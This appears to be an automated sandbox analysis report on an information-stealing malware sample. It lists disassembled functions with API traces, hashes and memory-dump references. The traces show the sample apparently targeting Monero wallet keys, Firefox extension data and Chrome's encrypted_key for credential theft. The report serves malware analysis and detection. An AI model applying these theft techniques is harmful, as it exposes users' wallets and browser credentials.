Opcode ID: 7daa633868845decc95faaf2279330de7c74e6a99e95cf616a3f2b99f7eced31
Instruction ID: bf24eacc2781b231917eb590df5d7c871eaca0d43c8feb7fb0b905ba3a9bd703
Opcode Fuzzy Hash: 7daa633868845decc95faaf2279330de7c74e6a99e95cf616a3f2b99f7eced31
Instruction Fuzzy Hash: 5F41B7B6D00508EBDB15EBA0DC86FFE733DAB98300F404558B755571C1EAB59B888B92

Function 00107E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107E37
RtlAllocateHeap.NTDLL(00000000), ref: 00107E3E
RegOpenKeyExA.KERNEL32(80000002,00CCBF90,00000000,00020119,?), ref: 00107E5E
RegQueryValueExA.KERNEL32(?,00CDDA60,00000000,00000000,000000FF,000000FF), ref: 00107E7F
RegCloseKey.ADVAPI32(?), ref: 00107E92

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: e5522647563e43f4330d053f16e34415cdfb0fe00a49611e6616e7c51579c2d3
Instruction ID: d2c36f9c1a583b80c4b1bb6e5e2fed8629a1550bbfbf630beb3e28922873e580
Opcode Fuzzy Hash: e5522647563e43f4330d053f16e34415cdfb0fe00a49611e6616e7c51579c2d3
Instruction Fuzzy Hash: 53114CB1A44605EBD705CBD4DD89FBBBBBCEB08B10F104159F645A72C0D7B468008BA2

Function 000F12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F12B4
RtlAllocateHeap.NTDLL(00000000), ref: 000F12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000F12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000F12F5
RegCloseKey.ADVAPI32(?), ref: 000F12FF

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: afce99a0f6208bec427891fb65eaf3be5444fa6171b6c149adf8cb70f7a12ba4
Instruction ID: d0cec95d0709907dc2f77831056cb974d545682e170a1f70ef09e5ee209b063a
Opcode Fuzzy Hash: afce99a0f6208bec427891fb65eaf3be5444fa6171b6c149adf8cb70f7a12ba4
Instruction Fuzzy Hash: CC01E1B9A40208BBDB05DFE4DC89FAEBBBCEB48701F108159FA459B280D6759A058F51

Function 000FA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00CD8FE0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 000FA0BD
LoadLibraryA.KERNEL32(00CDDC20), ref: 000FA146

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A820: lstrlen.KERNEL32(000F4F05,?,?,000F4F05,00110DDE), ref: 0010A82B
Part of subcall function 0010A820: lstrcpy.KERNEL32(00110DDE,00000000), ref: 0010A885

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

SetEnvironmentVariableA.KERNEL32(00CD8FE0,00000000,00000000,?,001112D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00110AFE), ref: 000FA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 000FA0B2, 000FA0C6, 000FA0DC

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: ce06aa74ab383bfd6c3b65d5c8eb9cff6d03c85fbe308393ae6a9ecd3370e5fb
Instruction ID: 638fcf64d78f095f029a2afb1cd08a53c148fd0011bbe9b36410cb8af9c82913
Opcode Fuzzy Hash: ce06aa74ab383bfd6c3b65d5c8eb9cff6d03c85fbe308393ae6a9ecd3370e5fb
Instruction Fuzzy Hash: B04171B1A01A049FCB46DFA4ECC6BEE73BCBB19301F444019F685932A1DB755944DB53

Function 000FA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00108B60: GetSystemTime.KERNEL32(00110E1A,00CDA8E0,001105AE,?,?,000F13F9,?,0000001A,00110E1A,00000000,?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 00108B86

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000FA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 000FA3FF
lstrlen.KERNEL32(00000000), ref: 000FA6BC

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

DeleteFileA.KERNEL32(00000000), ref: 000FA743

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e1d0d57707f810cef7c371c99e458875d592ab5ef6bedc1fa26bce1ecbbb61ce
Instruction ID: a0991cfca7296068b0642c256f9d47c2e3ead53bfde3d4443471514a7c9045bd
Opcode Fuzzy Hash: e1d0d57707f810cef7c371c99e458875d592ab5ef6bedc1fa26bce1ecbbb61ce
Instruction Fuzzy Hash: 65E1ED729102089BDB05FBA4DD96EEE733CAF74301F908169F556720D1EFB06A49CB62

Function 000FD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00108B60: GetSystemTime.KERNEL32(00110E1A,00CDA8E0,001105AE,?,?,000F13F9,?,0000001A,00110E1A,00000000,?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 00108B86

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000FD801
lstrlen.KERNEL32(00000000), ref: 000FD99F
lstrlen.KERNEL32(00000000), ref: 000FD9B3
DeleteFileA.KERNEL32(00000000), ref: 000FDA32

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 8349737ceb635185425b64ae97d732bc921b0707ca96a77f9165b849a4ef3a78
Instruction ID: 2a75372526f305250a9d28311a93c32f641239515cbcb09013e037f294513164
Opcode Fuzzy Hash: 8349737ceb635185425b64ae97d732bc921b0707ca96a77f9165b849a4ef3a78
Instruction Fuzzy Hash: 548117719102089BDB05FBA4DD96EEE733CAF74301F908519F587A60D1EF746A09CBA2

Function 000FF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
Part of subcall function 000F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
Part of subcall function 000F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
Part of subcall function 000F99C0: ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
Part of subcall function 000F99C0: LocalFree.KERNEL32(000F148F), ref: 000F9A90
Part of subcall function 000F99C0: CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

Part of subcall function 00108E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00108E52

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00111580,00110D92), ref: 000FF54C
lstrlen.KERNEL32(00000000), ref: 000FF56B

Strings

^userContextId=4294967295, xrefs: 000FF59C
moz-extension+++, xrefs: 000FF5AD

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 9d2cd2052a7a584f3857a1d368249fb71b8fc42bda103047d2c062f942e8e6b6
Instruction ID: fab6b9f714b422b11a5caa0ae1d359ec14aae12fef483159def404f42bfdafb2
Opcode Fuzzy Hash: 9d2cd2052a7a584f3857a1d368249fb71b8fc42bda103047d2c062f942e8e6b6
Instruction Fuzzy Hash: A051F371D10208AADB04FBA4DC96DFD7379AF64300F80C529F956A71D1EF746A09CBA2

Function 000F9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 000F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
Part of subcall function 000F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
Part of subcall function 000F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
Part of subcall function 000F99C0: ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
Part of subcall function 000F99C0: LocalFree.KERNEL32(000F148F), ref: 000F9A90
Part of subcall function 000F99C0: CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

Part of subcall function 00108E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00108E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000F9D39

Part of subcall function 000F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9AEF
